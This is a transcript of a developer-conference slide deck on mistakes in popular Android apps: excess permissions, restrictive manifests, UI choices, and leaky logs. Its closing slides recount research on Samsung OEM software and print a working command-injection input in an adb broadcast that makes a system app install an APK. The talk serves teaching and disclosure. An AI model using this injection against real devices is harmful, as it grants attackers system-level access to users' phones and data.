+ All Categories
Home > Documents > Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Date post: 27-Dec-2015
Category:
Upload: andrejancevski
View: 23 times
Download: 2 times
Share this document with a friend
Description:
Learn from the biggest fails on Google Play Store
146
ANDROID APP BASHING LEARN FROM THE BIGGEST FAILS
Transcript
Page 1: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

ANDROID APP BASHINGLEARN FROM THE BIGGEST FAILS

Page 2: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Eyal LEZMY

http://eyal.fr

SLIDES http://bit.ly/andbigfails

Page 3: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

IT ALL STARTS ON THE PLAY STORE

01

Page 4: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9
Page 5: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Request only what your app requires

1/3 of apps request more permissions than they need

MINIMISE PERMISSIONS

Users should prefer apps

requesting the least

permissions

Page 6: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

You don’t need permission

Use ContentProviders

MINIMISE PERMISSIONS

Users should prefer apps

requesting the least

permissions

Page 7: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Permission are not required to launch another activity that has the permission

MINIMISE PERMISSIONS

Page 8: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Need a contact?

MINIMISE PERMISSIONS

Page 9: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Use the force, Luke

MINIMISE PERMISSIONS

Page 10: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MINIMISE PERMISSIONS

Intent intent = new Intent(Intent.ACTION_GET_CONTENT);intent.setType(Phone.CONTENT_ITEM_TYPE);startActivityForResult(intent, MY_REQUEST_CODE);

Start the contact app

Handle the result

void onActivityResult(int requestCode, int resultCode, Intent data) { if (data != null) { Uri uri = data.getData(); if (uri != null) { Cursor c = getContentResolver().query(uri, new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);} }

}}

Page 11: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Need an UUID?

TelephonyManager.getDeviceId()Requires READ_PHONE_STATE permission

MINIMISE PERMISSIONS

NO!

Settings.Secure.ANDROID_IDReset at every wipeNot applicable on multi user environment

Page 12: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Need an UUID?

Generate your own UUID and use Backup API !

MINIMISE PERMISSIONS

String id = UUID.randomUUID().toString();

YES!

Page 13: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Android Backup API

· API is available on all Android devices. · Manufacturors can implements their own transport and storage for the API

· Each device as its own backup data

· A new device will take a backup from a device associated with your google account.

· IT'S NOT A SYNC API !

MINIMISE PERMISSIONS

Page 14: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT STORY EPISODE 102

Page 15: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

? ? ?

Page 16: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

LOOK AND FEEL

HOTMAIL OUTLOOK.COM

Page 17: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

HOTMAIL OUTLOOK.COM

LOOK AND FEEL

SAME!

Page 18: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

LOOK AND FEEL

FOLLOW THE GUIDELINES!http://d.android.com/design

Page 19: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Redesigned by Taylor Ling

LOOK AND FEEL

Page 20: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

By Microsoft

LOOK AND FEEL

Page 21: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

LOOK AND FEEL

Page 22: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

LOOK AND FEEL

FOLLOW THE GUIDELINES!http://d.android.com/design

Page 23: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

LOOK AND FEEL

FOLLOW THE GUIDELINES!http://d.android.com/design

PLEASE!

Page 24: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT STORY EPISODE 203

Page 25: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9
Page 26: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

XBOX MUSIC

Page 27: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Emulator(last devices configuration)

Nexus 7S4

Nexus 10Note 2

Galaxy Nexus

S3Mega

Note 1XCover (Android 2.3)

Tablets

XBOX MUSIC

Page 28: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Our Nutshell

XBOX MUSIC

Brand New devicesS4, Mega, HTC One, Xperia Z, ...

TabletsNexus 7/10, Tab2, Tab3, Note 10.1, …

Old devicesXCover

Not compatible

Page 29: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Our Nutshell

XBOX MUSIC

Main stream devicesS3, Galaxy Nexus, Note2, Note1, ...

Compatible

Page 30: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

The dark side of the force,

Luke

XBOX MUSIC

Page 31: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Let’s look into the

Manifest

XBOX MUSIC

Page 32: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

<uses-sdk android:minSdkVersion="14"

android:targetSdkVersion="14" />

Exclude the old devices

XBOX MUSIC

Not recommended (sept. 2013)

Page 33: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

<compatible-screens>

<screen android:screenSize=" small" android:screenDensity=" ldpi" />

<screen android:screenSize=" small" android:screenDensity=" mdpi" />

<screen android:screenSize=" small" android:screenDensity=" hdpi" />

<screen android:screenSize=" small" android:screenDensity=" xhdpi" />

<screen android:screenSize=" normal" android:screenDensity=" ldpi" />

<screen android:screenSize=" normal" android:screenDensity=" mdpi" />

<screen android:screenSize=" normal" android:screenDensity=" hdpi" />

<screen android:screenSize=" normal" android:screenDensity=" xhdpi" />

</compatible-screens>

Excludes tablets

XBOX MUSIC

Excludes brand new devices(XXHDPI screens)

Too restrictive!

Page 34: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

XBOX MUSIC

“You should not use this element”It can dramatically reduce the potential user base for your application

“Use it only as a last resort”When the application absolutely does not work with specific screen configurations

“Instead, follow the guide to Supporting Multiple Screens”

compatible-screens<>

Page 35: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

XBOX MUSIC

It does not accept xxhdpi But you can instead specify 480 as the valuecompatible-screens

<>

Page 36: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

XBOX MUSIC

Nothing seems tricky...

Page 37: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

XBOX MUSIC

XXHDPI7.7% of Android devices

XXHDPI

Page 38: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

XBOX MUSIC

Tablets11.2% of Android devices

XXHDPI

Page 39: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

XBOX MUSIC

Missing targets18,9% of the market

XXHDPI

Page 40: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

The Mistakes

XBOX MUSIC

Have they tested on new devices?

Ignoring the power usersBrand new devices are bought by power users and early adopters

Does not support preloading musicThe app is not prefectly opimized for mobility. Why ignoring nomad devices like tablets?

Page 41: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Return of the APK

XBOX MUSIC

Page 42: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

A day after

XBOX MUSIC

Page 43: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

A day after

XBOX MUSIC

They updated the app

Page 44: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

<supports-screens

android:smallScreens="true"

android:normalScreens="true"

android:largeScreens="false"

android:xlargeScreens="false" />

XBOX MUSIC

<uses-sdk android:minSdkVersion="14"

android:targetSdkVersion="18" />

Page 45: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

<supports-screens

android:smallScreens="true"

android:normalScreens="true"

android:largeScreens="false"

android:xlargeScreens="false" />

<uses-sdk android:minSdkVersion="14"

android:targetSdkVersion="18" />

XBOX MUSIC

HURRAY!!

Page 46: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT STORY EPISODE 304

Page 47: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9
Page 48: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT OFFICE

Follows the guidelines… This time

Page 49: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT OFFICE

Not that badBut it could be better

Page 50: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Fight the confusion

MICROSOFT OFFICE

Office 365 offer is quite confusingPeople used to buy Office licenses, not to subscribe to an Office service

They try to avoid confusion

Page 51: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT OFFICE

Page 52: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT OFFICE

The title is clear

Page 53: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT OFFICE

Is it enough explicit?

Page 54: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Problem

MICROSOFT OFFICE

Does not support tablet formatA productivity app has to be compatible with big screens formats

- The app is optimized for a phone - On tablet, you can use the Office Webapps- We plan to enable editing with Webapps

Microsoft’s answer on PlayStore

Page 55: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Other problems

MICROSOFT OFFICE

Less features than the competitorsDoes not support local filesDoes not support edition

The backend seems not very readyI have been stuck during 24 hours at the mobile activation, and I’m not alone

Page 56: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Conclusion

MICROSOFT OFFICE

Adapt your UI to screen sizes depending on your features

Differenciate your service from competitorsEspecially when you are new on the market

Your backend have to support your mobile distribution

Page 57: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

One more thing!

MICROSOFT OFFICE

Page 58: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Check out the

Manifest

MICROSOFT OFFICE

Page 59: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT OFFICE

<uses-permission android:name="android.permission.READ_LOGS"/>

<uses-sdk android:minSdkVersion="14"

android:targetSdkVersion="16" />

They support ICS+

Read sensitive log data

Page 60: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

MICROSOFT OFFICE

XXHDPI

Ignore READ_LOGSJelly Bean removed this feature

Accepts READ_LOGS38% of the supported devices

Page 61: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Don’t do this

Why scaring 100% of your users?To use a feature with 38% of them

Avoid using deprecated functionsAs much as possible

MICROSOFT OFFICE

Page 62: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO! WEATHER05

Page 63: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9
Page 64: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

Beautiful...

Page 65: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

Very good score

Page 66: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Is it perfect?

Hell no!

YAHOO WEATHER

Page 67: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

« Try not.Do.

Or do not.There is no try. »

YAHOO WEATHER

YODA

Page 68: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

A splashscreen

Page 69: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

Non native UI

Page 70: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

Non native UI

Page 71: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

Where is my status bar?

Page 72: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

Immersive experienceGames, Books, Videos

MultitaskingEverything else

Hide status bar

Showstatus bar

Page 73: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

When do you check the weather?

Morning?- Choosing your clothes- Eating your breakfast- Checking your emails- Looking after your kids

This is multitasking!

YAHOO WEATHER

Page 74: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

YoutubeAn immersive app

No status bar

Page 75: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

It allows multitaskingInside the app

Playing video

Page 76: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

Samsung Video Player

Page 77: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

YAHOO WEATHER

Popup play

Samsung Video Player

Page 78: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

About the context you

have to think

YAHOO WEATHER

Page 79: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK EPISODE 106

Page 80: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9
Page 81: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Under the hood

March 2013

Too much methodsLinearAlloc buffer overflow

Solution is to divide the code into several dex filesAnd load it on demand

FACEBOOK

Page 82: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Under the hood

March 2013

Facebook app source code was not enough modular to allow this at application level“Too many of our classes are accessed directly by the Android framework”

They had to do it at system level, thanks to reflection“We needed to inject our secondary dex files directly into the system class loader”

FACEBOOK

Page 83: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

« More backwards compatibility for Facebook.

Another day, another private field accessed. »

FACEBOOK

GIT COMMENTANDROID SOURCE CODE

January 2013

Page 84: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK

/**

* List of dex/resource (class path) elements.

* Should be called pathElements, but the Facebook app uses reflection

* to modify 'dexElements' (http://b/7726934).

*/

private final Element[] dexElements;

Android source code - DexPathList.javaCommit January 2013

Page 85: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK

Patch set 2

lets facebook start (at least judging by logcat output)

Android code reviewJanuary 2013

After manual testing

facebook starts, though i don't have an account.

Page 86: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

This was not enough

They finally patched Dalvik VMUsing native hot fix to change the LinearAlloc buffer size

FACEBOOK

Page 87: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

I feel dirty

FACEBOOK

Page 88: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

In a nutshell

Modularity saves lifes

Google seems to test some popular apps during integrationSo they don’t break the system apps

Google hires engineers when Facebook hires sculptorsInspired by Sayo Oladeji

FACEBOOK

Page 89: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK EPISODE 207

Page 90: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9
Page 91: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

A lock screen

Page 92: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

Several services supported

Page 93: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

And a launcher

Page 94: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

Page 95: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

The problem

The launcher is too simpleNo folderNo widgetNo dock (during first months)

It used to be mandatoryLockscreen + Launcher

FACEBOOK HOME

Page 96: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

Page 97: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

Page 98: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

Opens default launcher

Page 99: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

Spot the odd one out

Page 100: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

FACEBOOK HOME

No, actually, there is no consistency

Page 101: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Conclusion Keep the platform spiritTo override native OS elements you need first to implement all the basic features the user use to use

Identify your weakest pointsAnd prepare how to limit their impact

FACEBOOK HOME

Page 102: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

08 CANAL PLUS

Page 103: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9
Page 104: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

CANAL+ TOUCH

Request: https://canalURL.com/1.5/getThmChannel.php...

Request: https://canalURL.com/1.5/getProgramThm.php...

Request: https://canalURL.com/1.4/programRediff.php...

Request: https://canalURL.com/1.5/VOD.php?release=1...

json response : {"token":{"url":"http:\/\/download....

Request: https://canalURL.com/1.4/getChannel.php?SE...

json response: {"token":{"url":"https:\/\/canalURL....

Request: https://canalURL.com/1.5/guideTvChannel.ph...

Request: https://canalURL.com/1.5/programInfo.php?U...

Request: https://canalURL.com/1.5/myTv.php?release=...

This is the logcat

Page 105: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Chatty logs Make reverse engineering easierHTTPS connexionPHP backend All the URLS and parameters are knownSome of the response are known too

CANAL+ TOUCH

Page 106: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Chatty logs Can bring really big security breaches

CANAL+ TOUCH

Page 107: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

https://canalURL.com/1.5/authentification.php?

login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...

CANAL+ TOUCH

This is always the logcat

Page 108: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

https://canalURL.com/1.5/authentification.php?

login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...

CANAL+ TOUCH

This is always the logcat

Wait WHAT ?!

Page 109: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Shut the fuck up!

Control your log outputEasy method with BuildConfig.DEBUG

Never send clear password over the networkNEVAAAAAAA!!!!

CANAL+ TOUCH

Page 110: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

CANAL+ TOUCH

public static final boolean SHOW_LOG = BuildConfig.DEBUG;

public static void d(final String tag, final String msg) { if (SHOW_LOG) Log.d(tag, msg);}

Avoid the leak, easily

And test it during QA

Page 111: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

OEM SOFTWARE09

Page 112: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

The Android

framework

Many APKsImplement the features

Often have system accessTo use low level features

OEM SOFTWARE

Page 113: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Open bar?

OEM SOFTWARE

Page 114: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Let’s see

OEM SOFTWARE

Page 115: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Android OEM applications(in)security

Talk by ANDRE MOULUQuarkslab

OEM SOFTWARE

Page 116: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Methodology Reverse engineeringUsing Androguard

A custom result environmentManifest analysisCheck for sensitive API usageDiff between OS version (to find patches)

OEM SOFTWARE

Page 117: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

The results on Samsung

devices

12 vulnerabilities foundLeak personal informationAccess non-permited featuresSilent SMS controlCode injection...

Similar vulnerabilities on many constructors

OEM SOFTWARE

Page 118: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Gimme more!

OEM SOFTWARE

Page 119: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Search forsharedUserId = systemSensitive user ID

Command executionSensitive usage

OEM SOFTWARE

Find serviceModeApp.apk= Very sensitive app !

Page 120: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

OEM SOFTWARE

<receiver name=".FTATDumpReceiver"><intent-filter>

<action name="com.android.sec.FTAT_DUMP"></action></intent-filter>

</receiver>

<receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">

<intent-filter><action name="com.android.sec.FAILDUMP"></action>

</intent-filter></receiver>

Receiver declared twice

Page 121: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

<receiver name=".FTATDumpReceiver"><intent-filter>

<action name="com.android.sec.FTAT_DUMP"></action></intent-filter>

</receiver>

<receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">

<intent-filter><action name="com.android.sec.FAILDUMP"></action>

</intent-filter></receiver>

OEM SOFTWARE

Permission asked for this action

Page 122: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

<receiver name=".FTATDumpReceiver"><intent-filter>

<action name="com.android.sec.FTAT_DUMP"></action></intent-filter>

</receiver>

<receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">

<intent-filter><action name="com.android.sec.FAILDUMP"></action>

</intent-filter></receiver>

OEM SOFTWARE

No permission needed for this action!!

Page 123: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public void onReceive(Context paramContext, Intent paramIntent) {String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){

String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");

[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,

FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);

}[...]

}

OEM SOFTWARE

We read the FTATDumpReceiver source code

Page 124: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public void onReceive(Context paramContext, Intent paramIntent) {String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){

String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");

[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,

FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);

}[...]

}

OEM SOFTWARE

Intercepts the FTAT_DUMP action

Page 125: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public void onReceive(Context paramContext, Intent paramIntent) {String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){

String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");

[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,

FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);

}[...]

}

OEM SOFTWARE

Concats the FILENAME extra to str3

Page 126: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public void onReceive(Context paramContext, Intent paramIntent) {String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){

String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");

[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,

FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);

}[...]

}

OEM SOFTWARE

Other concatenations follow

Page 127: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public void onReceive(Context paramContext, Intent paramIntent) {String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){

String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");

[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,

FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);

}[...]

}

OEM SOFTWARE

Prepares an intent to FTATDumpService

Page 128: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public void onReceive(Context paramContext, Intent paramIntent) {String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){

String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");

[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,

FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);

}[...]

}

OEM SOFTWARE

Adds the final string to the intent

Page 129: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public void onReceive(Context paramContext, Intent paramIntent) {String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){

String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");

[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,

FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);

}[...]

}

OEM SOFTWARE

Starts the FTATDumpService with our FILENAME parameter as extra

Page 130: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0;}

OEM SOFTWARE

We read then the FTATDumpService source code

Page 131: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0;}

OEM SOFTWARE

Extracts the FILENAME extra to str

Page 132: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0;}

OEM SOFTWARE

Opens and starts a new thread

Page 133: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0;}

OEM SOFTWARE

Seems to “do a shell command” with our FILENAME parameter concatenated

Page 134: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

OEM SOFTWARE

private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true;} This is DoShellCmd function

Page 135: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

OEM SOFTWARE

private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true;}

Creates a shell commandAnd runs it

Page 136: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

OEM SOFTWARE

private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true;}

And our FILENAME parameter is still not modified

Page 137: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

OEM SOFTWARE

private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true;}

And our FILENAME parameter is still not modified

BINGO!

Page 138: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Access toAll permissions declared by system apps156 for this case

All files belonging to system userWifi keysPassword, PIN, gesture storage...

OEM SOFTWARE

Page 139: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;

/system/bin/pm install an.apk; #'

Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0

OEM SOFTWARE

A simple broadcast for FTAT_DUMP action

Page 140: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;

/system/bin/pm install an.apk; #'

Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0

OEM SOFTWARE

We declare the FILENAME argument

Page 141: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;

/system/bin/pm install an.apk; #'

Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0

OEM SOFTWARE

We point the destination file to null

Page 142: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;

/system/bin/pm install an.apk; #'

